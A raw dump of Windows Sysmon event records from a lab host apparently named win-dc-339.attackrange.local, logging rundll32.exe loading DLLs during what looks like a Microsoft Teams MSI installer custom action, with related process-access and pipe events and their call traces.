23542300x800000000000000079425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.904{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\System.Spatial.resources.dllMD5=AD73B408CD61BC349ECB29D018A90F25,SHA256=60225714F5F67C7AFE03ADAD6B06DE02396F687F441813847C7C5D083AB10FBD,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.904{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\System.Spatial.dllMD5=539ECBA6ADC02BD1711E0C0883A502AF,SHA256=0B347698A279A88CF278759100A488941AAF7ACCA96C52194845290D08A26366,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.904{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Squirrel.dllMD5=787F70131787B84A5BACCC51B5FDEB10,SHA256=D36F4F1DC51A3C93C4A578BAE0FAEE4DECD06B7B29F813197E06B5CDC105A7C3,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.904{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Splat.dllMD5=1975E684C48457D72F37696BB1B880E6,SHA256=7A6F255CF59D6594C8F5BC466956F09305A3A10C8D683E485C7E1F14371701C4,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.857{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\SetupConfigCustomAction.dllMD5=87015D400C9199B4A701EB81A664B551,SHA256=4346DC073DBB96595CC1CAD1F4EB2FCC729E8284F4968A73C25B8296A81187E4,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.857{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\NuGet.Squirrel.dllMD5=6A5C1FA6116A760D4CE0B31B65A71E4C,SHA256=BCD5B82372B117F16956B5704A56FC37D3DA91A9D8A8BBB53D026B99B88F0817,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.841{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Mono.Cecil.dllMD5=7546ACEBC5A5213DEE2A5ED18D7EBC6C,SHA256=7744C9C84C28033BC3606F4DFCE2ADCD6F632E2BE7827893C3E2257100F1CF9E,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.826{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Microsoft.Web.XmlTransform.dllMD5=6AD7D1E92C9833F4BDDE6A4BC84F2E1A,SHA256=13DCF5066E00152238191314D4A46605204FFABDBB830BDD0C97DF3027D1261D,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.779{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Microsoft.Deployment.WindowsInstaller.dllMD5=233CA870E2530DA48897DB8FA6F1E3CF,SHA256=CA420FEF4909C10E2E95C8C899FA7D009892DDDF0B2424870236F1D0676E9165,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.763{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Microsoft.Deployment.Resources.dllMD5=343DC7A39956EC67A576C91D3765A1CD,SHA256=71D85BB2863F61CA11625E8BEE171114047D3F3E95792309E2040F3E139BAAE3,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.732{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Microsoft.Data.Services.Client.resources.dllMD5=7F92069CFD4EA63487C25D6ECD96D1F3,SHA256=36DD5A40328C39E032F2CDB3B0F8CCF384716E46488A4E3356A387F74C03357B,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.716{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Microsoft.Data.Services.Client.dllMD5=269BDEFAC8F933B2B133660BCEB81F13,SHA256=3CE056DD03533E4A8D9644B99ADE69B8CF6D5EDF3AB26FE2B9467AEC17A3C85D,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.685{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Microsoft.Data.OData.resources.dllMD5=055CACF6D88D81AD52A8E30E83235CD2,SHA256=8435109572A7548A21C20CC0A3054060127F49376EFAF548AAA303828F257217,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.669{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Microsoft.Data.OData.dllMD5=2D8AEF0300B61BB6A075950900AEFFE3,SHA256=B37D4E017BB6444E00F7A840BD3562D194D199288A0B8406B6DCB431A867B702,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.638{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Microsoft.Data.Edm.resources.dllMD5=72CB6CEFD5CE2E63EF929EC63B5C84AF,SHA256=AFCC051B49B4A102BD618D8F3E914346D402588E42333F71C2AB43C9F90F5590,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.623{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Microsoft.Data.Edm.dllMD5=78131030AB1F627955BE3182345BD001,SHA256=E5B0363A26DB4A5C0EDBB8D0EFF0A7B7C071C6C31960832A4332D31FCD170170,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.607{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Microsoft.Bond.Interfaces.dllMD5=52A51EE95888A7BA3A277C02AC07734B,SHA256=AF910124D7E52D5350D4AB125FA661032936C53D7ADAD081D32766F25297A17E,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.591{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Microsoft.Bond.dllMD5=E71099478421938F865EE4AD49B5D4E8,SHA256=41A5C53E2AFAD3E9934582B97229216D614A0AFE520C4ADB765B01E7801BE727,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.560{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Microsoft.Applications.Telemetry.dllMD5=13A81056CEAEDAA4C8A4FBB59AA5D92C,SHA256=5E733EF38D2B71111A91B6BC468F415B59BF2B33157D4F728B8926014405E330,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.560{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\Microsoft.Applications.Telemetry.Desktop.dllMD5=D5FD6ADB0C22D8D947A9E282EDD89D6D,SHA256=100CF34635E4BCD9C3793E9231736E6FF62715FCEAB32BAFBFF49B48B85AC64A,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.529{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\ICSharpCode.SharpZipLib.dllMD5=F2BF7155CDB0F7E7ED3AF446BA588D8E,SHA256=B6BC2CCDD4E72C087B5D9D19E29F5069310EEF5ADE4B42D367960997433F0C05,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.513{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\DeltaCompressionDotNet.MsDelta.dllMD5=F6437EBA2912907A6F13CC18E17239F0,SHA256=7C64414EF3A6E73D3CE5761DC964EB27DA68F70F8B0C04AD62DEE0AA9EAF1BEB,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.498{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\DeltaCompressionDotNet.dllMD5=3CE9C038499D47BFDFABC197F34E04F8,SHA256=2F2FAEBE394F94EAF7F0FBDC09E43F8370717F5C684B66AB61A7DABB755EF4BF,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.482{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\CustomAction.configMD5=4BFDEF8658100D564788F676B4A63864,SHA256=A2E973CCE1F85A2AB9D6E7A90909B17B332C1EF4159FFC57BB3CF688E02BA9EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.466{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Windows\Installer\MSIB3E8.tmp-\BootstrapperCore.dllMD5=B0D10A2A622A322788780E7A3CBB85F3,SHA256=F2C2B3CE2DF70A3206F3111391FFC7B791B32505FA97AEF22C0C2DBF6F3B0426,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000079400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.451{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600ATTACKRANGE\AdministratorC:\Windows\SysWOW64\rundll32.exeC:\Program Files (x86)\Teams Installer\setup.jsonMD5=19AD152B4BF6B7482CD1FF761CA0EBAA,SHA256=190C38F4F1B04B75B5CEC8D03D3946A94E54044662752ACA7D54C8193EBC5C70,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000079399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:23.154{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600\SfxCA_13808859C:\Windows\SysWOW64\rundll32.exe 10341000x800000000000000079398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.138{A7A01FEF-B626-607E-1600-00000000BB01}15402648C:\Windows\system32\svchost.exe{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600C:\Windows\SysWOW64\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.138{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600C:\Windows\SysWOW64\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.091{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000079395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.091{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+5c6b3|C:\Windows\System32\SHELL32.dll+57217|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.091{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.091{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.091{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.091{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.060{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.060{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.060{A7A01FEF-C0A3-607E-6C05-00000000BB01}36242592C:\Windows\system32\csrss.exe{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600C:\Windows\SysWOW64\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.060{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.060{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.060{A7A01FEF-EC0E-607E-390E-00000000BB01}50763376C:\Windows\syswow64\MsiExec.exe{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600C:\Windows\SysWOW64\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIB3E8.tmp+28f8(wow64)|C:\Windows\Installer\MSIB3E8.tmp+247f(wow64)|C:\Windows\Installer\MSIB3E8.tmp+3a7b(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x800000000000000079384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.065{A7A01FEF-EC0F-607E-3A0E-00000000BB01}4600C:\Windows\SysWOW64\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft 